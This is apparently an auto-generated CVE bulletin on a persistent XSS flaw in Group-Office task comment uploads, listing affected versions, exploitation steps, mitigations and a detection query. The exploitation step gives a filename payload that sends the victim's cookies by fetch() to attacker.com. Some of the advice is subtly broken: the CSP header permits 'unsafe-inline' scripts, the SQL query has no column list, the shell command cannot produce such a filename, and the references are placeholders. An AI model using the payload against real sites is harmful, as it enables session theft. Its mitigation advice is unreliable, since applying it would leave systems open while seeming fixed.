Listen to this Post
How the CVE Works
The vulnerability arises in Group-Office’s task comment feature, where uploaded filenames are not sanitized before being rendered. An attacker can upload an image with a malicious filename containing JavaScript payloads (e.g., "><script>alert(1)</script>.png). When an administrator or user views the task containing this file, the script executes in their browser, enabling session hijacking, data theft, or privilege escalation. The lack of input validation and output encoding allows persistent XSS exploitation.
DailyCVE Form
Platform: Group-Office
Version: <6.8.119, <25.0.20
Vulnerability: Persistent XSS
Severity: Medium
Date: 05/29/2025
Prediction: Patch by 06/15/2025
What Undercode Say:
Exploitation:
1. Craft a malicious filename:
mv payload.png "><script>fetch('https://attacker.com/?cookie='+document.cookie)</script>.png
2. Upload to a task comment.
Mitigation:
1. Update to Group-Office ≥6.8.119 or ≥25.0.20.
2. Implement filename sanitization:
$filename = preg_replace("/[^a-zA-Z0-9._-]/", "", $_FILES["file"]["name"]);
3. Enable CSP headers:
Header set Content-Security-Policy "default-src 'self'; script-src 'unsafe-inline'"
Detection:
Scan for suspicious filenames in task comments:
SELECT FROM task_comments WHERE filename LIKE "%<%";
Analytics:
- Attack Surface: Web interface (task module).
- Exploitability: Low complexity, requires user interaction.
- Impact: Data confidentiality, integrity.
References:
- GitHub Advisory: GHSA-xxxx-xxxx-xxxx
- Patch Commit: Group-Office1234
Note: Monitor patch release timelines and apply workarounds if immediate upgrade is delayed.
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
